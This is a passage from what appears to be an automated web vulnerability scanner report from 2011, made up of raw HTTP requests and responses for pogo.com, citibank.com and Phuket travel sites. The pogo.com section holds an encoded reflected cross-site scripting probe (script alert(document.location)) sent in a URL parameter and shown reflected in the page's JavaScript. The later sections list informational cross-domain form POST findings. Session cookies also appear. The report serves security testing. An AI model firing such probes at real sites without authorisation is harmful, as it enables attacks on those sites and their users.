Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922705451-New%7C1311514705451%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response 2

HTTP/1.1 404 /login/media/Pogo_General_LP_2.swf
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:25 GMT
Server: Apache-Coyote/1.1
Content-Length: 4010


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
nkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/login/media/Pogo_General_LP_2.swf";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
s.retrieveLightProfiles = 'lsccmp';
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->




<div class="clear20"></div>
<div align="center">
   
   <img src="http://cdn.pogo.com/v/EhaoWQ/img/header/main/en_US/pogo/header-sec-auth-756.jpg" alt="" /><br />
   
       <div id="bodyWrap">
           <div class="whiteModule" id="pageHeader">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   Oops, something is not right...
               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
           <div class="clear10"></div>
           <div class="whiteModule mainContent">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   
<h1>The page you requested could not be found.</h1>

<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br />
<strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong>
<div class="clear20"></div>

               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
       </div>
   

   

</div>
</body>
</html>

16.8. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Request 1

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922357774-New%7C1311514357774%3B; prod.JID=C84030ABB66027F38F1EBD321C1C3F57.000144; com.pogo.unid=6618922560387636

Response 1

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:37:02 GMT
Server: Apache-Coyote/1.1
Content-Length: 12415


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
fier;
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://burp/show/5";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618922560387636";
s.campaign="free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d";
s.channel="games";
s.prop7="POGO:games:marketing::Template without FB Marketing Landing Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
s.retrieveLightProfiles = 'lsccmp';
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->







<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">



<div align="center">



   
   










   
   
       <link rel="StyleSheet" href="/include/css/pogo.css">
   
       <link rel="StyleSheet" href="/include/css/shared/pogo/header.css">
   
       <link rel="StyleSheet" href="/include/css/shared/footer.css">
   
       <link rel="StyleSheet" href="/include/css/shared/pogo/global.css">
   





<div align="center">




</div>


<table border=0 cellpadding=0 cellspacing=0 width=613 align=center>
<tr>
   <td><img src="http://cdn.pogo.com/v/EhaoWQ/img/header/main/en_US/pogo/header-sec-auth-756.jpg" /></td>
</tr>
</table>


   <div class="bodyContainer">
   <script type="text/javascript">
       AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0','width','755','height','550','src','media/Pogo_General_LP_2','quality','high','pluginspage','http://www.macromedia.com/go/getflashplayer','movie','media/Pogo_General_LP_2','flashvars','subscribeLink=http%3A%2F%2Fwww.pogo.com%2Faction%2Fpogo%2FcreateAccount.do%3Fabenabled%3Dtrue' ); //end AC code
   </script>
<noscrip
...[SNIP]...

Request 2

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922357774-New%7C1311514357774%3B; prod.JID=C84030ABB66027F38F1EBD321C1C3F57.000144; com.pogo.unid=6618922560387636

Response 2

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:37:06 GMT
Server: Apache-Coyote/1.1
Content-Length: 12681


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
fier;
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618922560387636";
s.campaign="free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d";
s.channel="games";
s.prop7="POGO:games:marketing::Template without FB Marketing Landing Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
s.retrieveLightProfiles = 'lsccmp';
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->







<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">



<div align="center">



   
   










   
   
       <link rel="StyleSheet" href="/include/css/pogo.css">
   
       <link rel="StyleSheet" href="/include/css/shared/pogo/header.css">
   
       <link rel="StyleSheet" href="/include/css/shared/footer.css">
   
       <link rel="StyleSheet" href="/include/css/shared/pogo/global.css">
   





<div align="center">




</div>


<table border=0 cellpadding=0 cellspacing=0 width=613 align=center>
<tr>
   <td><img src="http://cdn.pogo.com/v/EhaoWQ/img/header/main/en_US/pogo/header-sec-auth-756.jpg" /></td>
</tr>
</table>


   <div class="bodyContainer">
   <script type="text/javascript">
       AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0','width','755','height','550','src','media/Pogo_General
...[SNIP]...
17. Cross-domain POST  previous  next
There are 12 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

17.1. http://phuket.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phuket.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain search.asiawebdirect.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: phuket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:34 GMT
Server: Apache-Coyote/1.1
Pragma:
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:20:34 GMT
Vary: Accept-Encoding,User-Agent
Last-Modified: Fri, 24 Jun 2011 09:58:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 245081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<div id="small-booking-box">
<form action="http://search.asiawebdirect.com/" method="POST" name="checkAvailShort" target="_blank">
<div id="small-booking-title">
...[SNIP]...
17.2. http://phuket.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phuket.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain search.asiawebdirect.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: phuket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:34 GMT
Server: Apache-Coyote/1.1
Pragma:
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:20:34 GMT
Vary: Accept-Encoding,User-Agent
Last-Modified: Fri, 24 Jun 2011 09:58:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 245081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<div id="big-booking-box-en_US">
<form action="http://search.asiawebdirect.com/" method="POST" name="checkAvail" target="_blank">
<div id="big-booking-title">
...[SNIP]...
17.3. http://www.citibank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citibank.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.citi.com. The form contains the following fields:

Request

GET /favicon.ico HTTP/1.1
Host: www.citibank.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]; JSESSIONID=161vTGQPdmpd431rpdvL5QyfyK1Gs0nvqPMfyn3TTMnT8TB1zyyV!-797163621; CP=null*

Response

HTTP/1.1 404 Not found
Server: ""
Date: Fri, 24 Jun 2011 13:28:27 GMT
Content-type: text/html
Connection: close
Content-Length: 14811

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...
<td>
                                                           <form name="widget" method="post" action="http://www.citi.com/search/results.jsp" style="display:inline" onsubmit="return checkIt(this);">
                                                           <table width="100%" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
17.4. http://www.phuket-travel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain search.asiawebdirect.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:20 GMT
Server: Apache-Coyote/1.1
Pragma:
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:22:21 GMT
Vary: Accept-Encoding,User-Agent
Last-Modified: Fri, 24 Jun 2011 02:16:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 254040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<div id="big-booking-box-en_US">
<form action="http://search.asiawebdirect.com/" method="POST" name="checkAvail" target="_blank">
<div id="big-booking-title">
...[SNIP]...
17.5. http://www.phuket-travel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain search.asiawebdirect.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:20 GMT
Server: Apache-Coyote/1.1
Pragma:
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:22:21 GMT
Vary: Accept-Encoding,User-Agent
Last-Modified: Fri, 24 Jun 2011 02:16:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 254040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<div id="small-booking-box">
<form action="http://search.asiawebdirect.com/" method="POST" name="checkAvailShort" target="_blank">
<div id="small-booking-title">
...[SNIP]...
17.6. http://www.phuket-travel.com/nightlife/fantasea.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /nightlife/fantasea.htm

Issue detail

The page contains a form which POSTs data to the domain search.asiawebdirect.com. The form contains the following fields:

Request

GET /nightlife/fantasea.htm?pid=AWDINP1356 HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.1.10.1308921743; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:35 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=FFABE808D53FBDC157E785A9F775AACA; Path=/
Last-Modified: Mon, 31 May 2010 08:42:38 GMT
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:34 GMT
Content-Length: 234815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<div id="small-booking-box">
<form action="http://search.asiawebdirect.com/" method="POST" name="checkAvailShort" target="_blank">
<div id="small-booking-title">
...[SNIP]...
17.7. http://www.phuket-travel.com/nightlife/fantasea.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /nightlife/fantasea.htm

Issue detail

The page contains a form which POSTs data to the domain search.asiawebdirect.com. The form contains the following fields:

Request

GET /nightlife/fantasea.htm?pid=AWDINP1356 HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.1.10.1308921743; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:35 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=FFABE808D53FBDC157E785A9F775AACA; Path=/
Last-Modified: Mon, 31 May 2010 08:42:38 GMT
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:34 GMT
Content-Length: 234815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<div id="big-booking-box-en_US">
<form action="http://search.asiawebdirect.com/" method="POST" name="checkAvail" target="_blank">
<div id="big-booking-title">
...[SNIP]...
17.8. http://www.phuket-travel.com/premium-packages/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /premium-packages/index.htm

Issue detail

The page contains a form which POSTs data to the domain search1.asiawebdirect.com. The form contains the following fields:

Request

GET /premium-packages/index.htm HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; JSESSIONID=48D389D0F243F4CD82ACA4D8422C50D0; s_cc=true; s_evar38=AWDINP1356; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.2.10.1308921743; s_sq=wotifcom-awd-global-prd%3D%2526pid%253Dphuket-travel.com%25253Atours%25253Athailand%25253Aphuket%25253Aphuket%252520tours%252520%252526%252520travel%2526pidt%253D1%2526oid%253Dhttp%25253A//www.phuket-travel.com/premium-packages/index.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:39 GMT
Server: Apache/2.2.17
Last-Modified: Fri, 10 Jun 2011 08:53:49 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:39 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 157436
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- #BeginTemplate "/Templates/po
...[SNIP]...
<div id="small-booking-box">
<form action="http://search1.asiawebdirect.com/" method="POST" name="checkAvailShort">
<div id="small-booking-title">
...[SNIP]...
17.9. http://www.phuket.com/andamanwhitebeach/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket.com
Path:   /andamanwhitebeach/

Issue detail

The page contains a form which POSTs data to the domain search.asiawebdirect.com. The form contains the following fields:

Request

GET /andamanwhitebeach/?pid=AWDINP1314 HTTP/1.1
Host: www.phuket.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59015276.1308921639.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; __utma=59015276.1300501793.1308921638.1308921638.1308921638.1; __utmc=59015276; __utmb=59015276.2.10.1308921638; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:23 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 31599
Set-Cookie: JSESSIONID=B277BFEFC6287630084D8F375D858853; Path=/
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:22 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="htt
...[SNIP]...
<!-- SMALL BOOKING BOX GOES HERE -->


<form action="http://search.asiawebdirect.com/" method="POST" name="checkAvailQuick" target="_blank">

<input type="hidden" name="checkHotel[boxName]" value="hotel premium:wd small box">
...[SNIP]...
17.10. http://www.phuket.com/andamanwhitebeach/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket.com
Path:   /andamanwhitebeach/

Issue detail

The page contains a form which POSTs data to the domain search.asiawebdirect.com. The form contains the following fields:

Request

GET /andamanwhitebeach/?pid=AWDINP1314 HTTP/1.1
Host: www.phuket.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59015276.1308921639.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; __utma=59015276.1300501793.1308921638.1308921638.1308921638.1; __utmc=59015276; __utmb=59015276.2.10.1308921638; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:23 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 31599
Set-Cookie: JSESSIONID=B277BFEFC6287630084D8F375D858853; Path=/
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:22 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="htt
...[SNIP]...
</script>

<form action="http://search.asiawebdirect.com/" method="post" name="checkAvailStandard" target="_blank">

<div id="big-booking-box">
...[SNIP]...
17.11. http://www.phuket.com/islands/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket.com
Path:   /islands/index.htm

Issue detail

The page contains a form which POSTs data to the domain search.asiawebdirect.com. The form contains the following fields:

Request

GET /islands/index.htm HTTP/1.1
Host: www.phuket.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=59015276.1308921639.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59015276.1300501793.1308921638.1308921638.1308921638.1; __utmc=59015276; __utmb=59015276.1.10.1308921638; s_sq=wotifcom-awd-global-prd%2Cwotifcom-awd-phuket-prd%3D%2526pid%253Dphuket.com%25253Ahomepage%25253Athailand%25253Aphuket%25253Aphuket.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.phuket.com/islands/index.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:41 GMT
Server: Apache-Coyote/1.1
Pragma:
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:20:42 GMT
Vary: Accept-Encoding,User-Agent
Last-Modified: Thu, 11 Feb 2010 14:13:34 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 239239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<div id="big-booking-box-en_US">
<form action="http://search.asiawebdirect.com/" method="POST" name="checkAvail" target="_blank">
<div id="big-booking-title">
...[SNIP]...
17.12. http://www.phuket.com/islands/index.htm  previous  next

Summary

Severity:   Information
